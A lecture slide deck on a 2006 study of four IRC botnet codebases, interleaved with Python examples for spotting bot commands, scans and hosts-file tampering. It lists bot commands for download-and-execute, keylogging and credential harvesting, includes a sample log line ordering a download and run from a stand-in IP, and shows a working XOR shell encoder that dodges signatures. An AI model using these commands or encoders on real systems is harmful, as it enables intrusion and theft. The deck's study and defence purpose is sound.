An Inside Look at Botnets
By Paul Barford and Vinod Yegneswaran
In Series: Advances in Information Security, Springer, 2006

Presented by Jared Bott
Outline
   Why Study Botnets?
   A Brief History of Botnets
   Bot Study
   Findings and Implications
   Analysis of Paper




                                 2
Why?
   Malicious software is a major problem
       Reactive methods predominantly used today are
        ultimately insufficient
   Proactive methods are required
       Develop a foundational understanding of the
        mechanisms used by malicious software
       Develop an open repository of malware
        information


                                                        3
Botnets
   A botnet is a collection of compromised
    computers controlled by their attacker
   Botnets trace their roots to the Eggdrop bot
       Created in 1993 as a benign tool for managing IRC
        channels (the paper credits Jeff Fisher; Eggdrop is
        generally attributed to Robey Pointer)




                                                       5
Rise of Botnets
   Motivation for malicious activity is shifting
       Primary motivation has changed from vandalism
        and demonstration of programming skills to for-
        profit activities
           Identity theft, extortion
           Backed by organized crime




                                                          6
Botnets Today
   Botnets can be extremely large, with reports
    of botnets of over 100,000 systems
       Average size appears to be dropping
   Total estimated number of systems used in
    botnets is in the millions




                                                   7
Bot Study
   Objectives
       Highlight the richness and diversity of bot
        codebases
       Identify commonalities between codebases
       Consider how knowledge of these botnet
        mechanisms can lead to development of more
        effective defense mechanisms




                                                      9
Bot Study
   Attributes of bots to analyze
       Architecture
       Botnet Control Mechanisms
       Host Control Mechanisms
       Propagation Mechanisms
       Target Exploits and Attack Mechanisms
       Malware Delivery Mechanisms
       Obfuscation Methods
       Deception Strategies
                                                10
Bot Study
   Four bot codebases
       Agobot 4.0 pre-release
       SDBot 05b
       SpyBot 1.4
       GT Bot with DCOM




                                 11
Agobot
   AKA Gaobot, Phatbot
   First referenced in October, 2002
   Most sophisticated of the four codebases
       Typically around 20,000 lines of C/C++
   Single large codebase (the paper calls the architecture
    monolithic)
   Adheres to structured design and software
    engineering principles
       Internally modular, standard data structures, code documentation
   Exhibits creativity in design

                                                                12
Agobot
   Components
       IRC-based command and control mechanism
       Large collection of target exploits
       Ability to launch different kinds of DoS attacks
       Modules for shell encodings and limited
        polymorphism
       Mechanisms to frustrate disassembly by well
        known tools


                                                           13
Agobot
   Components
       Ability to harvest local host for sensitive
        information, such as Paypal passwords and AOL
        keys through traffic sniffing, key logging or
        searching registry entries
       Mechanisms to defend and fortify compromised
        systems
   Over 580 variants


                                                        14
SDBot
   First referenced in October, 2002
   Hundreds of variants
   Fairly simple compared to Agobot
       Slightly over 2,000 lines of C
   Main source tree does not contain any overtly
    malicious code modules
   Published under GPL
   Primarily provides a utilitarian IRC-based
    command and control system
                                                15
SDBot
   Easy to extend
   Large number of patches that provide more
    sophisticated malicious capabilities; keeping them
    outside the base tree diffuses responsibility for
    the malicious code
       Scanning
       DoS attacks
       Sniffers
       Information harvesting
       Encryption routines
   Over 80 patches
                                                       16
SpyBot
   First referenced in April, 2003
   Hundreds of variants
   Fairly compact, around 3,000 lines of C
   Shares much of SDBot’s command and
    control engine
   No explicit attempt to diffuse accountability



                                                    17
SpyBot
   Capabilities
       NetBIOS, Kuang, Netdevil and KaZaa exploits
       Scanning capabilities
       Modules for launching flooding attacks
   Efficient
   Does not exhibit modularity or breadth of
    capabilities of Agobot


                                                      18
GT Bot
   AKA Global Threat Bot, Aristotles
   First referenced in April, 1998
   Over 100 variants
   Simple design
   Limited set of functions based on the
    scripting capabilities of mIRC
   Includes HideWindow program to keep the
    bot hidden
                                              19
GT Bot
   Includes BNC, a proxy system for anonymity
   Includes psexec.exe to facilitate remote
    process execution
   Nothing to suggest it was designed to be
    extensible
   Different versions for specific malicious
    intents
       With DCOM includes DCOM exploits

                                                 20
Bot Codebases
   Convergence in the set of functions that are
    available
       Suggests the possibility that defensive systems
        may eventually be effective across bot families
   Bot codebases are at least somewhat
    extensible




                                                          21
Points of Analysis
   Botnet Control Mechanisms
   Host Control Mechanisms
   Propagation Mechanisms
   Target Exploits and Attack Mechanisms
   Malware Delivery Mechanisms
   Obfuscation Methods
   Deception Strategies

                                            22
Botnet Control Mechanisms
   Command language and control protocols
    are used to operate botnets remotely after
    target systems have been compromised
   All analyzed bots base C&C on IRC
   Disruption of communication can render a
    botnet useless
       Network operators can sniff for specific
        commands in IRC traffic and identify
        compromised systems
                                                   23
Botnet Control Mechanisms
   Agobot
       C&C system built on IRC
       Standard IRC is used to establish connections
       Command language is IRC plus commands
        developed specifically for Agobot
   SDBot
       Command language is lightweight version of IRC
       Has IRC cloning and spying

                                                         24
(Figure) Typical interaction between an SDBot and IRC server
                                                         25
Botnet Control Mechanisms
   SpyBot
       Command language is a subset of SDBot’s
        command language
   GT Bot
       Simplest command language of the bot families
       Large variations across different versions




                                                        26
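Detection logic for the point above, as an added example that is not part of the original deck or the paper: it parses IRC PRIVMSG lines from a constructed capture and flags messages whose first word is one of the command names listed in the Agobot, SDBot and SpyBot command tables in this deck. The "."/"!" command-prefix convention, the sample nicks, channel and addresses are assumptions; real variants rename commands, so the vocabulary is a seed for a detector, not a finished signature set.

```python
import re
from collections import defaultdict

# Command vocabulary drawn from the Agobot, SDBot and SpyBot command tables in
# the deck. Illustrative only; real variants rename and extend these.
BOT_COMMANDS = {
    "agobot": {"harvest.cdkeys", "harvest.emails", "harvest.emailshttp",
               "harvest.aol", "harvest.registry", "harvest.windowskeys",
               "pctrl.list", "pctrl.kill", "pctrl.listsvc", "pctrl.killsvc",
               "pctrl.killpid", "inst.asadd", "inst.asdel", "inst.svcadd",
               "inst.svcdel"},
    "sdbot": {"download", "killthread", "update", "sysinfo", "execute",
              "cdkey", "getcdkey"},
    "spybot": {"startkeylogger", "stopkeylogger", "sendkeys", "keyboardlights",
               "passwords", "listprocesses", "killprocess", "opencmd", "cmd",
               "disconnect", "reboot"},
}

# Assumed herder convention: commands are prefixed with '.' or '!' (common in
# SDBot/SpyBot variants). Agobot's dotted names are accepted unprefixed.
COMMAND_PREFIXES = ".!"

# PRIVMSG as relayed by an IRC server: ":nick!user@host PRIVMSG target :text"
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!\S+\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")


def classify_line(line):
    """Return (family, command) when a PRIVMSG text opens with a bot command,
    otherwise None. Plain words such as 'update' only count when prefixed,
    which keeps ordinary chat from matching the generic SDBot verbs."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    words = m.group("text").split()
    if not words:
        return None
    first = words[0]
    prefixed = first[0] in COMMAND_PREFIXES
    token = first.lstrip(COMMAND_PREFIXES).lower()
    for family, commands in BOT_COMMANDS.items():
        if token in commands and (prefixed or "." in token):
            return family, token
    return None


def scan_irc_log(lines):
    """Group hits by sending nick: {nick: [(family, command), ...]}.
    A nick issuing several commands is the herder's pattern; the bots
    themselves mostly reply and do not issue commands."""
    hits = defaultdict(list)
    for line in lines:
        result = classify_line(line)
        if result is not None:
            nick = PRIVMSG_RE.match(line.strip()).group("nick")
            hits[nick].append(result)
    return dict(hits)


# Constructed sample capture, not real traffic. Addresses are documentation
# and private ranges; the channel and nicks are invented.
SAMPLE_LOG = [
    ":herder!x@10.0.0.5 PRIVMSG #b0tz :.harvest.cdkeys",
    ":herder!x@10.0.0.5 PRIVMSG #b0tz :.download http://198.51.100.7/u.exe c:\\u.exe 1",
    ":alice!a@192.0.2.9 PRIVMSG #linux :update your kernel, the patch is out",
    ":herder!x@10.0.0.5 PRIVMSG #b0tz :!startkeylogger",
    ":bob!b@192.0.2.10 PRIVMSG #linux :anyone tried the new release?",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    for nick, found in scan_irc_log(SAMPLE_LOG).items():
        print(nick, found)
```

Run against a capture, the output is a list of nicks that issued bot commands and the channel they used; that channel is what the slide's "disruption of specific channels" implication acts on. Expect false positives from the short SDBot verbs in busy channels, and tune the prefix rule and vocabulary to the variant actually seen.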
Host Control Mechanisms
   The mechanisms used by the bot to
    manipulate a victim host once it has been
    compromised
       Fortify the local system against other attackers
       Disable anti-virus software
       Harvest sensitive information




                                                             28
Host Control Mechanisms
   Agobot
       Commands to secure system
       Broad set of commands to harvest sensitive
        information
       pctrl commands to list or kill processes running
        on host
       inst commands to add or delete autostart entries



                                                           29
Agobot Commands
Command               Description
harvest.cdkeys        Return a list of CD keys
harvest.emails        Return a list of emails
harvest.emailshttp    Return a list of emails via HTTP
harvest.aol           Return a list of AOL specific information
harvest.registry      Return registry information for specific registry path
harvest.windowskeys   Return Windows registry information
pctrl.list            Return list of all processes
pctrl.kill            Kill specified process set from service file
pctrl.listsvc         Return list of all services that are running
pctrl.killsvc         Delete/stop a specified service
pctrl.killpid         Kill specified process
inst.asadd            Add an autostart entry
inst.asdel            Delete an autostart entry
inst.svcadd           Add a service to SCM
inst.svcdel           Delete a service from SCM
                                                                 30
Host Control Mechanisms
   SDBot
       Limited capabilities
       Basic remote execution commands
       Some ability to gather local information
       Auxiliary patches add more capabilities




                                                   31
SDBot Commands
Command                                   Description
download <url> <dest> <action>            Download the specified file and execute it if action is 1
killthread <thread#>                      Kill specified thread
update <url> <id>                         If bot ID differs from the current one, download "sdbot executable" and update
sysinfo                                   List host system information (CPU/RAM/OS and uptime)
execute <visibility> <file> <parameters>  Run a specified program (visibility is 0/1)
cdkey/getcdkey                            Return keys of popular games, e.g., Halflife, Soldier of Fortune
                                                                                           32
Host Control Mechanisms
   SpyBot
       Similar capabilities to Agobot
       Local file manipulation
       Key logging
       Process/system manipulation, remote command
        execution




                                                      33
SpyBot Commands
Command                       Description
delete <filename>             Delete a specified file
execute <filename>            Execute a specified file
rename <origfile> <newfile>   Rename a specified file
makedir <dirname>             Create a specified directory
startkeylogger                Starts the on-line keylogger
stopkeylogger                 Stops the keylogger
sendkeys <keys>               Simulates key presses
keyboardlights                Flashes remote keyboard lights 50x
passwords                     Lists the RAS passwords in Windows 9x systems
listprocesses                 Return a list of all running processes
killprocess <processname>     Kills the specified process
threads                       Returns a list of all running threads
killthread <number>           Kills a specified thread
disconnect <number>           Disconnect the bot for number seconds
reboot                        Reboot the system
cd-rom <0/1>                  Open/close cd-rom
opencmd                       Starts cmd.exe (hidden)
cmd <command>                 Sends a command to cmd.exe
get <filename>                Triggers DCC send on bot
update <url>                  Updates local copy of the bot code
                                                                             34
Host Control Mechanisms
   GT Bot
       Most limited capabilities
       Base capabilities are only gathering local system
        information and running or deleting local files
       Many versions with more capabilities




                                                            35
Propagation Mechanisms
   The mechanisms bots use to search for new
    host systems
       Traditionally horizontal or vertical scans
           Horizontal is one port across an address range
           Vertical is across a port range on an address




                                                             37
Propagation Mechanisms
   Agobot
       Relatively simple, essentially vertical and
        horizontal scanning
   SDBot
       No scanning or propagation in base distribution
       Variants with horizontal, vertical scanning and
        more complex methods



                                                          38
Propagation Mechanisms
   SpyBot
       Simple horizontal and vertical scanning
   GT Bot
       Simple horizontal and vertical scanning
   Because the scanning methods are simple and uniform
    across families, it may be possible to develop
    statistical fingerprinting methods that identify
    scans coming from botnets

                                                  39
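The horizontal/vertical distinction and the fingerprinting idea from the slides above, as an added example that is neither the paper's code nor any bot's: it classifies constructed connection-attempt records by scan shape and scores how much of a source's port set overlaps a family's known target ports. The threshold of 16 targets and the port profile (service ports behind the scanner names on the exploits slide: DCOM 135, NetBIOS 139/445, MS-SQL 1433, Bagle backdoor 2745, MyDoom backdoor 3127, Radmin 4899, Dameware 6129) are this example's assumptions, not values the paper gives.

```python
from collections import defaultdict

# Service ports behind the scanners in the Agobot exploit list on the exploits
# slide. The port mapping is this example's assumption; the paper names the
# scanners, not the ports.
AGOBOT_PORT_PROFILE = frozenset({135, 139, 445, 1433, 2745, 3127, 4899, 6129})


def classify_scans(flows, min_targets=16):
    """flows: iterable of (src_ip, dst_ip, dst_port) connection attempts.
    Returns {src_ip: [(kind, key, count), ...]} where kind is 'horizontal'
    (one port across many hosts, key=port) or 'vertical' (many ports on one
    host, key=dst_ip). min_targets is the count an ordinary client should
    stay under inside the observation window."""
    hosts_per_port = defaultdict(lambda: defaultdict(set))
    ports_per_host = defaultdict(lambda: defaultdict(set))
    for src, dst, port in flows:
        hosts_per_port[src][port].add(dst)
        ports_per_host[src][dst].add(port)

    findings = defaultdict(list)
    for src in hosts_per_port:
        for port, hosts in hosts_per_port[src].items():
            if len(hosts) >= min_targets:
                findings[src].append(("horizontal", port, len(hosts)))
        for dst, ports in ports_per_host[src].items():
            if len(ports) >= min_targets:
                findings[src].append(("vertical", dst, len(ports)))
    return dict(findings)


def profile_match(flows, src, profile=AGOBOT_PORT_PROFILE):
    """Fraction of the distinct ports a source touched that fall inside a
    bot family's target-port set: a crude fingerprint separating a bot
    sweeping its exploit ports from an admin's full-range port scan."""
    ports = {port for s, _, port in flows if s == src}
    if not ports:
        return 0.0
    return len(ports & profile) / len(ports)


# Constructed flow records, not captured traffic.
SAMPLE_FLOWS = (
    [("10.0.0.5", f"10.1.0.{i}", 445) for i in range(1, 41)]    # bot: port 445 sweep
    + [("10.0.0.5", f"10.1.0.{i}", 135) for i in range(1, 31)]  # bot: port 135 sweep
    + [("192.0.2.7", "10.1.0.9", p) for p in range(1, 51)]      # admin: ports 1-50 on one host
    + [("192.0.2.8", "10.1.0.9", 80), ("192.0.2.8", "10.1.0.10", 80)]  # ordinary web client
)

if __name__ == "__main__":
    for src, found in classify_scans(SAMPLE_FLOWS).items():
        print(src, found, f"agobot-profile={profile_match(SAMPLE_FLOWS, src):.2f}")
```

Both sources get flagged as scanners, but only the bot scores 1.0 against the profile; the admin's vertical scan scores 0.0. That second number is what a family-level fingerprint adds on top of a generic scan detector.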
Exploits and Attack Mechanisms
   Specific methods for attacking known
    vulnerabilities on target systems
   Agobot
       Includes an ever broadening set of exploits
       Agobot exploits
           Bagle scanner
           DCOM scanners
           MyDoom scanner
           Dameware scanner
           NetBIOS scanner
           Radmin scanner
           MS-SQL scanner
           Generic DDoS module
                                                               41
Exploits and Attack Mechanisms
   SDBot
       No exploits in standard distribution
       Modules for sending UDP and ICMP packets
           DoS
       Numerous variants with exploits
       Numerous variants with DDoS attack modules




                                                     42
Exploits and Attack Mechanisms
   SpyBot
       Exploits depend on version of SpyBot
           Wide range of exploits
       Evaluated version has attacks on open NetBIOS
        shares
       DDoS interface closely related to SDBot
           UDP, ICMP, and TCP SYN




                                                        43
Exploits and Attack Mechanisms
   GT Bot
       This variant has RPC-DCOM exploits and Simple
        ICMP floods
       Many variants with many exploits and DoS
        capabilities
   Bots will likely become more like Agobot,
    each version having many exploits



                                                        44
Malware Delivery Mechanism
   The mechanisms bots use to deliver exploits
   Packers and shell encoders used to compress and
    obfuscate code
   SDBot, SpyBot, and GT Bot deliver exploit and
    encoded malware in one script
   Agobot separates exploits and delivery
       Exploit vulnerability and open shell on remote host
       Encoded malware binary delivered by HTTP or FTP
       Enables encoder to be used across exploits, streamlining
        codebase and potentially diversifying the resulting bit
        streams
                                                                   46
Agobot Delivery (figure)
   Attacker computer (Bot) -> Target computer
   1. Send exploit
   2. Open shell
   3. HTTP/FTP file transfer of bot
                                                                           47
Obfuscation Mechanisms
   The mechanisms that are used to hide the
    details of what is being transmitted through
    the network and what arrives for execution on
    end hosts
   Only Agobot supports any kind of
    polymorphism



                                                49
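The shell encoder idea that runs through the malware delivery slide (an encoder reused across exploits, diversifying the resulting bit streams) and this obfuscation slide, as one added example that is not code from the paper or from any of the four bots: a single-byte XOR encoder that picks keys keeping every encoded byte out of a bad-byte set, and a count of how a fixed byte signature written for the raw payload fares against the encoded variants. The bad-byte set and the placeholder payload are assumptions; the payload is arbitrary bytes, not executable code.

```python
# Byte values an ASCII-oriented transport or string copy tends to mangle or
# terminate on. Which values are "bad" depends on the target input path; this
# set is an assumption for the example.
BAD_BYTES = frozenset({0x00, 0x0A, 0x0D})


def encode_variants(payload, count, bad=BAD_BYTES):
    """Return up to `count` (key, encoded) pairs, each a single-byte XOR of
    `payload` under a different key, such that neither the key nor any
    encoded byte is in `bad`. Every pair decodes to the same payload."""
    variants = []
    for key in range(1, 256):
        if key in bad:
            continue
        encoded = bytes(b ^ key for b in payload)
        if bad.isdisjoint(encoded):
            variants.append((key, encoded))
            if len(variants) == count:
                break
    return variants


def encode(payload, bad=BAD_BYTES):
    """First usable (key, encoded) pair, or ValueError when no single-byte
    key can keep every encoded byte out of `bad`."""
    found = encode_variants(payload, 1, bad)
    if not found:
        raise ValueError("no single-byte XOR key avoids the bad-byte set")
    return found[0]


def decode(key, encoded):
    """What the receiving decoder stub does: XOR every byte with the key."""
    return bytes(b ^ key for b in encoded)


def signature_hits(signature, blobs):
    """How many blobs contain a fixed byte signature. A signature written
    for the raw payload does not survive encoding, which is the defender-side
    consequence of the slide's 'diversified bit streams'."""
    return sum(1 for blob in blobs if signature in blob)


# Constructed placeholder payload: arbitrary bytes, not executable code.
# It deliberately contains 0x00 and 0x0A so the raw form could not pass
# through a NUL- or newline-terminated input.
SAMPLE_PAYLOAD = bytes([0x00, 0x0A, 0x41, 0x42, 0x43, 0x90, 0x90, 0xCC])

if __name__ == "__main__":
    key, blob = encode(SAMPLE_PAYLOAD)
    print(f"key=0x{key:02x} encoded={blob.hex()}")
    print("round trip ok:", decode(key, blob) == SAMPLE_PAYLOAD)
    raw_sig = bytes([0x41, 0x42, 0x43])
    encoded_blobs = [e for _, e in encode_variants(SAMPLE_PAYLOAD, 8)]
    print("signature hits on 8 encoded variants:", signature_hits(raw_sig, encoded_blobs))
```

The design point for a defender: the encoded bytes change with every key, so a content signature has to target the decoder stub (which is the same in every variant) or the behaviour after decoding, not the encoded payload. Polymorphism, which only Agobot attempts, is the further step of also varying the stub.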
Deception Strategies
   The mechanisms used to evade detection once a
    bot is installed on a target host
       Rootkits
   Only Agobot has elaborate deception mechanisms
       Tests for debuggers
       Tests for VMware
       Killing anti-virus processes
       Redirecting anti-virus vendors' host names to
        localhost via the hosts file, so updates fail


                                                                   51
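A responder's check for the last deception mechanism above, as an added example that is not the paper's code: it parses hosts-file text and reports security-vendor names that resolve to a loopback or unspecified address. The vendor domain list is an assumption chosen for illustration (extend it to the vendors and update hosts actually in use), and the hosts-file contents are constructed.

```python
import ipaddress

# Security-vendor domains to watch. This list is the example's assumption,
# not something the paper tabulates; extend it to the vendors in use.
WATCHED_SUFFIXES = (
    "symantec.com", "mcafee.com", "sophos.com", "kaspersky.com",
    "f-secure.com", "trendmicro.com", "windowsupdate.com",
)


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, one per name on a
    line; comments, blank lines and malformed lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            yield str(ip), name.lower().rstrip(".")


def is_watched(name, suffixes=WATCHED_SUFFIXES):
    """Exact or subdomain match only; 'evilsymantec.com' must not match."""
    return any(name == s or name.endswith("." + s) for s in suffixes)


def find_hijacks(text, suffixes=WATCHED_SUFFIXES):
    """Return [(hostname, ip)] for watched names mapped to a loopback or
    unspecified address, i.e. entries that send vendor update traffic
    nowhere. The normal 'localhost' lines are not watched names and pass."""
    hits = []
    for ip, name in parse_hosts(text):
        addr = ipaddress.ip_address(ip)
        if (addr.is_loopback or addr.is_unspecified) and is_watched(name, suffixes):
            hits.append((name, ip))
    return hits


# Constructed hosts-file contents, not taken from any real system.
SAMPLE_HOSTS = """\
# sample header comment
127.0.0.1       localhost
::1             localhost
10.0.0.20       intranet.example.com
127.0.0.1       www.symantec.com liveupdate.symantec.com   # added by the bot
0.0.0.0         www.mcafee.com
127.0.0.1   update.symantec.com.
not-an-ip       malformed line
"""

if __name__ == "__main__":
    for name, ip in find_hijacks(SAMPLE_HOSTS):
        print(f"{name} -> {ip}")
```

On a live system, feed it the contents of the platform's hosts file (for Windows, %SystemRoot%\System32\drivers\etc\hosts). A hit is a strong indicator on its own, since nothing legitimate maps a vendor's update host to loopback, and it is cheap enough to run fleet-wide.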
Findings and Implications
   Finding: The overall architecture and
    implementation of botnets is complex and
    evolving toward the use of common software
    engineering techniques.
   Implication: The regularization of botnet
    architecture provides insight on potential
    extensibility and could help to facilitate
    systematic evaluation of botnet code.

                                                 53
Findings and Implications
   Finding: The predominant remote control
    mechanism is IRC and in general includes a
    rich set of commands.
   Implication: Monitoring botnet activity on IRC
    channels and disruption of specific channels
    on IRC servers should continue to be an
    effective defensive strategy for the time
    being.

                                                     54
Findings and Implications
   Finding: The host control mechanisms used
    for harvesting sensitive information from host
    systems are ingenious and enable data from
    passwords to mailing lists to credit card
    numbers to be gathered.
   Implication: This is one of the most serious
    results of the study and suggests design
    objectives for future operating systems and
    applications.

                                                 55
Findings and Implications
   Finding: There is a wide diversity of exploits
    for infecting target systems, including many
    of those used by worms that target well-known
    Microsoft vulnerabilities.
   Implication: This is yet additional evidence
    that keeping OS patches up to date is
    essential and informs requirements for
    network intrusion detection and prevention
    systems.

                                                  56
Findings and Implications
   Finding: All botnets include DoS attack
    capability.
   Implication: The specific DoS mechanisms in
    botnets can inform designs for DoS defense.




                                                  57
Findings and Implications
   Finding: All botnets include a variety of
    mechanisms for avoiding detection once
    installed.
   Implication: Development of methods for
    detecting and disinfecting compromised
    systems will need to keep pace.



                                                58
Findings and Implications
   Finding: Shell encoding and packing
    mechanisms are common. Polymorphism is
    found only in Agobot.
   Implication: A major focus on methods for
    detecting polymorphism may not be needed
    yet, but encodings will continue to present a
    challenge for defensive systems.


                                                    59
Findings and Implications
   Finding: Currently there are only a limited set
    of propagation mechanisms available in
    botnets.
   Implication: The specific propagation
    methods used in these botnets can form the
    basis for modeling and simulating botnet
    propagation.


                                                  60
Strengths
   Detailed evaluation of code and capabilities
   Starting point for malware database
       Open database would greatly help defensive
        capabilities
       Finding commonalities among bots could help
        create some kind of broad defense




                                                      62
Weaknesses
   Dynamic profiling of bots needs to be done
   Too many variants of bots to evaluate each
    and every one
   Analysis of this kind calls for source code
    access, which may not be available




                                                  63
Improvements
   Dynamic profiling
   Analysis points for other kinds of malware




                                                 64

				